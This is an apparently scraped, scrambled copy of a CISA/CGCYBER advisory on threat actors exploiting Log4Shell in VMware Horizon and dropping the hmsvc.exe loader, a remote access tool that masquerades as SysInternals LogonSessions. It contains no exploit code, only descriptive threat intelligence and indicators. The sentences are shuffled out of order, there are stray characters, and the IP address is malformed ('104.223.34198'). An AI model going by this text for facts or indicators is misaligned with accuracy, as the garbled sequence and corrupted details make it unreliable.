The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network. The embedded executable is a remote access tool that provides an array of C2 capabilities, including the ability to log keystrokes, upload and execute additional payloads, and provide graphical user interface (GUI) access over a target Windows system’s desktop. Hmsvc.exe is a Windows loader containing an embedded executable, 658_dump_64.exe.
It is unknown how the actors elevated privileges. When discovered, the analyzed sample of hmsvc.exe was running as NT AUTHORITYSYSTEM, the highest privilege level on a Windows system.
hmsvc.exe masquerades as a legitimate Microsoft Windows service (SysInternals LogonSessions software) and appears to be a modified version of SysInternals LogonSessions software embedded with malicious packed code. During malware installation, connections to IP address 104.223.34198 were observed.ĬISA and CGCYBER analyzed a sample of hmsvc.exe from the confirmed compromise. After obtaining access, threat actors uploaded malware, hmsvc.exe, to a compromised system. The sections below provide information CISA and CGCYBER obtained during incident response activities at two related confirmed compromises.ĬGCYBER conducted a proactive threat-hunting engagement at an organization (Victim 1) compromised by actors exploiting Log4Shell in VMware Horizon. In at least one confirmed compromise, the actors collected and exfiltrated sensitive information from the victim’s network. This IP address uses a self-signed certificate CN: WIN-P9NRMH5G6M8. These actors connected to known malicious IP address 104.223.34198. Since then multiple cyber threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers to obtain initial access to networks.Īfter obtaining access, some actors implanted loader malware on compromised systems with embedded executables enabling remote C2. VMware made fixes available and confirmed exploitation in the wild. (For more information on Log4Shell, see CISA’s Apache Log4j Vulnerability Guidance webpage and VMware advisory VMSA-2021-0028.13.) The request allows the malicious actors to take full control of the affected system. The vulnerability enables malicious cyber actors to submit a specially crafted request to a vulnerable system, causing the system to execute arbitrary code. Log4Shell is a remote code execution vulnerability affecting the Apache Log4j library and a variety of products using Log4j, such as consumer and enterprise services, websites, applications, and other products, including certain versions of VMware Horizon and UAG.
0 kommentar(er)
